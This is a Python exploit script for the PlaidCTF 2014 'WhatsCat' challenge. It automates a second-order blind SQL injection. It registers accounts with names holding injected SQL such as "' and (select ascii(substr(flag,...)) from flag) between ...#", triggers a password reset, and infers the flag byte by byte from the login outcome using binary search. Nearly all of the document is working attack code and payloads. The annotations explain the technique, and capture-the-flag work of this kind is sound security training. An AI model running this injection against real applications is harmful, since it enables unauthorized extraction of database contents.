
PPP's WhatsCat Challenge Exploit by @ngocdh

huyngoc Apr 13th, 2014 854 Never
#PPP's WhatsCat Challenge Exploit by @ngocdh
#http://play.plaidctf.com/files/whatscat-59b6f6c9b192457fa3e7d2253c8b24c9.tar.bz2
#
#Step 1 : Register with username "hn"
#Step 2 : Register with username "hn' and 21=(select length(flag) from flag)#"
#Step 3 : Reset the password of the 2nd user
#Step 4 : Log in as "hn" with the original password. If the password is now invalid, the injected condition was true (21 = length(flag))
#
#The flag table/column and its length were found manually
#This code extracts only the flag
  11.  
  12. import urllib2
  13. import string
  14. import random
  15.  
def idgen(size=6, chars=string.ascii_uppercase + string.digits):
  """Return a random identifier of ``size`` characters drawn from ``chars``.

  The caller appends this to a fixed suffix to get a fresh username for each
  probe.  ``random`` is used rather than a CSPRNG; the value only needs to be
  unlikely to collide, not unpredictable.
  """
  picked = []
  for _ in range(size):
    picked.append(random.choice(chars))
  return ''.join(picked)
  18.  
def check(pos,d,u):
  """Probe one byte of ``flag``: is ascii(substr(flag, pos, 1)) BETWEEN d AND u?

  ``pos``, ``d`` and ``u`` are strings that are spliced verbatim into the
  payload.  Returns 1 when the injected condition evaluated true (the clean
  user's login no longer works), 0 when it evaluated false.

  This is boolean-based blind injection observed through a side effect rather
  than a query result: the injected name is stored at registration and the
  reset step later acts on it.  NOTE(review): that the reset handler reuses
  the stored name without escaping (second-order injection) is inferred from
  the observable behaviour described in the header, not from server code.
  """
  # Random prefix so every probe registers distinct accounts and, presumably,
  # avoids collisions with accounts left over from earlier runs.
  # (`id` shadows the builtin of the same name.)
  id = idgen() + "hn"

  # Payload appended to the clean username; %20 is used because the request
  # body is hand-built rather than url-encoded.
  query = id + "'%20and%20(select%20ascii(substr(flag,"+pos+",1))from%20flag)%20between%20"+d+"%20and%20"+u+"#"

  url = "http://54.196.116.77/index.php?page=login"

  data_reg = "name="+id+"&pass=hn&email=hn&register=Register"
  data_reg2 = "name="+query+"&pass=hn&email=hn&register=Register"
  data_reset = "name="+query+"&reset=Forgot+Password&pass=&email="
  data_login = "name="+id+"&pass=hn&login=Login&email="

  # Request order matters: clean registration, injected registration, reset
  # for the injected user, then a login attempt with the clean user's original
  # password.  No timeout is passed to urlopen, so a stalled server blocks the
  # whole extraction; the responses to the first three requests are unused.
  a=urllib2.urlopen(url,data_reg).read()
  a=urllib2.urlopen(url,data_reg2).read()
  b=urllib2.urlopen(url,data_reset).read()
  c=urllib2.urlopen(url,data_login).read()

  # Successful login => the clean user's password was untouched => condition false.
  # NOTE(review): find() > 0 would miss a match at offset 0; >= 0 is the usual
  # test, although a hit at offset 0 in an HTML response is unlikely.
  if c.find("Welcome back")>0 and c.find("invalid")<0:
    return 0
  else:
    return 1
  40.  
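# Flag length, found manually (see header).  Positions start at 1 to match the
# 1-based substr() call built by check().
FLAG_LEN = 21

res = ""
for i in range(1, FLAG_LEN + 1):
  # Binary search over the byte range [p, q]; 8 halvings of 256 leave one value.
  p = 0
  q = 255
  for _ in range(0, 8):
    # Explicit floor division keeps the midpoint an int under both Python 2
    # and Python 3 division semantics.
    n = (p + q) // 2
    temp = check(str(i), str(p), str(n))
    # check() returns 1 when the byte is within [p, n]: narrow from above;
    # otherwise the byte is in [n+1, q].
    q = n if temp == 1 else q
    p = n + 1 if temp == 0 else p
  res = res + chr(p)
  # Parenthesised form prints the same single value on Python 2 and 3.
  print(res)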